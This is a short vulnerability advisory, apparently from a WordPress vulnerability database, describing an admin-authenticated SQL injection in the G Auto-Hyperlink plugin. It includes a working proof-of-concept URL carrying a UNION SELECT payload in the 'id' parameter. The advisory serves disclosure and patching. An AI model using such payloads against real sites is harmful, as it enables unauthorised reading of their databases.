G Auto-Hyperlink <= 1.0.1 - Admin+ SQL Injection

2021-10-07T00:00:00
ID WPEX-ID:C04EA768-150F-41B8-B08C-78D1AE006BBB
Type wpexploit
Reporter wpvulndb
Modified 2021-10-07T06:35:13

Description

The plugin does not sanitise or escape an 'id' GET parameter before using it in a SQL statement, to select data to be displayed in the admin dashboard, leading to an authenticated SQL injection

                                        
                                            https://plugins.trac.wordpress.org/browser/g-auto-hyperlink/trunk/g-auto-hyperlink.php#L271

Open the follow URL as admin, which will output the current DB user: https://exxample.com/wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--